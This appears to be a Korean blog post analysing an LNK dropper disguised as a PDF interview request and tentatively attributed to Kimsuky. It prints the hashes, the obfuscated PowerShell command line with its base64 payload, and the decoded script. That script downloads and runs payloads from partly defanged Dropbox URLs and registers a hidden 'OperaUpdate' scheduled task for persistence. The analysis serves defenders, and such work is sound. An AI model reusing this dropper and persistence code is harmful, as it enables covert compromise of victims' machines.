북한 김수키(Kimsuky)에서 만든악성코드-KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk(2025.4.5)

오늘은 북한 김수키(Kimsuky) 에서 만든 악성코드 KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk(2025.4.5)에 대해 알아보겠습니다. 일단 해당 부분은 어디까지나 북한 김수키(Kimsuky) 추정 입니다.
해시
파일명:KxS 북한 수해 인터뷰 요청서(대문?아카데미 이?열 이사장님).lnk
사이즈:1 MB
MD5:89bca3a895fc2c0b5e975372675f0049
SHA-1:169aa69557f591296388c6abe81e6ed7e559c6ed
SHA-256:6262c5ef438992966eda78d6d58e631592c4b78d09b6dd35fea3b6cdd46ac8d9
일단 해당 단체가 무엇인지 모르겠지만, 기독교의 사회 참여와 교회와 사회의 대화, 현재 사회의 인간 소외를 극복하는 인간화를 표방된 곳인데 여기에 왜 공격을 했는지 모르겠지만 일단 악성코드를 분석해 보겠습니다.

악성코드 에 포함된 파워셀 코드

악성코드 코드

StringData
{
 namestring: Type: PDF File
 Size: 358 KB
 Date modified: 04/20/2024 11:23
 relativepath: not present
 workingdir: not present
 commandlinearguments:
 -windowstyle hidden -nop -NoProf(i)le -NonI(n)teractive -ExecutionPolicy Bypass -c "$
 ss=\"JGhoaCA9IEpvaW4(t)UGF0aCAoW1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKSkgIktCUyDrto
 HtlZwg7IiY7ZW0IOyduO2EsOu3sCDsmpTssq3shJ(w)o64yA66y47ZmU7JWE7Lm0642w66+4IOydtOyCvOyXt
 CDsnbTsgqzsnqXri5gpLmRvY3giOyB3Z2V0(I)C1VcmkgImh0dHBzOi8vZGwuZ(H)JvcGJveHVzZXJjb250ZW50LmN
 vbS9zY2wvZmkvYWlreDZrb3A4MDNsZnY5dWg4MWx0L3Rlc3QuZ(G)9jeD9ybGtleT1kejV5anNoMmk5dnJvOTFzeDY
 zZDAxamE0JnN0PWo4Ymltb2NqJmRsPTAiIC1PdXRGaWxlICRoaGg7ICYgJGhoaDsgJHBw(c)CA9IEpvaW4tUGF0aCA
 oJGVudjpBcHBEYXRhKSAiT3BlcmFVcGRhdGUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICg(k)ZW52OkF
 wcERhdGEpICJ0ZW1wMDc0ODYzNDg4OS5wczEiOyB3Z2V0IC1VcmkgImh0dHBzOi8vZGwuZHJvcGJveHVzZXJjb250Z
 W50LmN(v)bS9zY2wvZmkvaW5kdTZ5dndodnVubm9qY2ZxcDhjL2FwcGxlLWt5LnR4dD9ybGtleT1xdXd6N3g4aThwc
 nZzOGw1YW9oM25qNGprJn(N)0PWhtaDIxb2JiJmRsPTAiIC1PdXRGaWxlICRhYWE7ICYgJGFhYTsgUmVtb3ZlLUl0Z
 W0gLVBhdGggJGFhYSAtRm9yY2U7JzsgJHN0c(i)B8IE91dC1GaWxlIC1GaWxlUGF0aCAkcHBwIC1FbmNvZGluZyBVV
 EY4OyAkYWN0aW9uID0gTmV3LVNjaGVkdWxlZFRhc2tBY3Rpb24g(L)UV4ZWN1dGUgJ1Bvd2VyU2hlbGwuZXhlJyAtQ
 XJndW1lbnQgJy1XaW5kb3dTdHlsZSBIaWRkZW4gLW5vcCAgLU5v(b)kludGVyYWN0aXZlIC1Ob1Byb2ZpbGUgLUV4Z
 WN1dGlvblBvbGljeSBCeXBhc3MgLUNvbW1hbmQgIiYgeyRhYmMgPSBKb2luLVBhdGg(g)KCRlbnY6QXBwRGF0YSkgX
 CJPcGVyYVVwZGF0ZS5wczFcIjsgJiAkYWJjO30iJzsgJHRyaWdnZXIgPSBOZXctU2NoZWR1bGVkVGFza1(R)yaWdnZ
 XIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcyg1KSAtUmVwZXRpdGlvbkludGVydmFsIChOZXctVGltZVN
 wYW4gL(U)1pbnV0ZXMgMzApOyAkc2V0dGluZ3MgPSBOZXctU2NoZWR1bGVkVGFza1NldHRpbmdzU2V0IC1IaWRkZW4
 7IFJlZ2lzdGVyLVNjaGVk(d)WxlZFRhc2sgLVRhc2tOYW1lICJPcGVyYVVwZGF0ZSAyMi0xNTQ1NDM0Mi03LjI4IiA
 tQWN0aW9uICRhY3Rpb24gLVRyaWdnZXIgJHR(y)aWdnZXIgLVNldHRpbmdzICRzZXR0aW5nczsgICRhYWEgPSBKb2luLVBhdGggKCRlbnY6QXBwRGF0YSkgImJvYXJkX2ZpcnN0LnBzM(S)I7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9maS80cTFtc3pqdmwzeXF5NHI1MHA4Yzcv(Y)XBwbGUtbHVjLnR4dD9ybGtleT1qd3o2dWFqbW1qZTJ5d3c3a2Y4ZmVvM2R6JnN0PWF3ODlheTN0JmRsPTA(i)IC1PdXRGaWxlICRhYWE(7)ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAtRm9yY2U7DQoNCg==\"; $aa = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Path $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 89897878; & $ee; Remove-Item -Path $ee -Force;"
 iconlocation: %ProgramFiles%\\Windows NT\\Accessories\\wordpad(.)exe

코드 분석

악성코드 실행시 에러

일단 기본적으로 PDF로 위장돼 있고 Base64 인코딩이 돼 있는 것을 확인할 수가 있습니다.
일단 해당 정확한 구조를 파악하기 위해서 Base64 인코딩된 것을 CyberChef 로 풀어주면 됩니다.
그러면 다음과 같은 결과 값을 확인을 할 수가 있을 것입니다.

CyberChef 로 베이스 64 디코딩

$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "KxS 북한 수해 인터뷰 요청서(대문x아카데미 이x열 이사장님).docx"; wget -Uri 
"hxxps://dl(.)0dropboxusercontent(.0com/scl/fi/aikx6kop803lfv9uh81lt/test(.)docx?r
lkey=dz5yjsh2i9vro91sx63d01(j)a4&st=j8bimocj&dl=0" -OutFile $hhh; & $hhh; $ppp = Joi
n-Path ($env:AppData) "OperaUpdate.ps1"; $str = '$aaa = Join-Path ($env:Ap(p)Data) "t
emp0748634889(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)com/scl/fi/indu6yv
(w)hvunnojcfqp8c/apple-ky(.)txt?rlkey=q(u)wz7x8i8prvs8l5aoh3nj4jk(&)st=hmh21obb&dl=0" 
-OutFile $aaa; & $aaa; Re(m)ove-Item -Path $aaa -Force;'; $str | Out-File -FilePa(t)h 
$ppp -Encoding UTF8; $action = New-ScheduledTaskAction -Execute 'PowerShell.exe' -Argu
ment '-WindowS(t)yle Hidden -nop  -NonInteractive -NoProfile -ExecutionPolicy Bypass -
Command "& {$abc = Join-Path ($env:A(p)pData) \"OperaUpdate.ps1\"; & $abc;}"'; $trigge
r = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-
TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-Schedul
edTask -TaskName "OperaUpdate 22-15454342-7.28" -Action $action -Trigger $trigger -Settin
gs $settings;  $aaa = Join-Path ($env:AppData) "board_first.ps1"; wget -Uri "hxxps://dl(.
)dropboxusercontent(.)com/scl/fi/4q1mszjvl3yqy4r50p8c7/apple-luc.txt?rlkey=jwz6u(a)jmmje2y
ww7kf8feo3d(z)&st=aw89ay(3)t&dl=0" -OutFile $aa(a); & $aaa; 
Remove(-)Item -Path $aaa -Force;

코드 분석

1.test.docx 다운로드 및 실행
임시 경로에 .docx 파일 저장->K?S 북한 수해 인터뷰 요청서(...)
& $hhh 는 PowerShell에서 문서를 실행(시도)
2.OperaUpdate.ps1 생성 및 코드 삽입
$str의 실제 내용
$str는 또 다른 악성 코드 (apple-ky.txt)를 다운로드하고 실행하는 서브 드롭퍼
다운로드 후 즉시 삭제하여 분석 흔적을 제거함
OperaUpdate.ps1 는 apple-ky.txt를 계속 재실행
내부적으로 명령 되어 있음 (멀티 페이로드 구조)
3. 작업 스케줄러 등록 (지속성 Persistence)
5분 후 실행되는 작업 스케줄러 생성
이후 30분마다 반복 실행
실행 명령:PowerShell -WindowStyle Hidden -nop ... & OperaUpdate(.)ps1
사용자가 컴퓨터를 재부팅을 해도 다시 실행을 해서 사용자 컴퓨터 나 노트북 환경에서 계속 악성코드를 실행하기 위한 장치입니다.
apple-luc.txt 를 이용한 추가 실행 및 삭제
apple-luc.txt 파일을 board_first(.)ps1로 저장->실행->삭제

pestudio 로 본 바이러스토탈 결과

서브 페이로드로 2차/3차 다운로더 또는 정보 수집
해당 사이트는 현재 드롭박스 사이트는 작동되지 않고 있으니 파일들이 다운로드 되지 않았지만, 동작을 예상하면 다음과 같습니다.
C:\Users\user\AppData\Roaming\OperaUpdate.ps1
C:\Users\user\AppData\Roaming\user.ps1
C:\Users\user\AppData\Roaming\board_first.ps1
C:\Users\user\AppData\Roaming\temp0748634889.ps1
입니다.
일단 이런 식으로 해서 악성코드들을 뿌리고 있으니 조시 하는 것을 항상 기본적인 보안 수칙을 지키는 것을 권장합니다.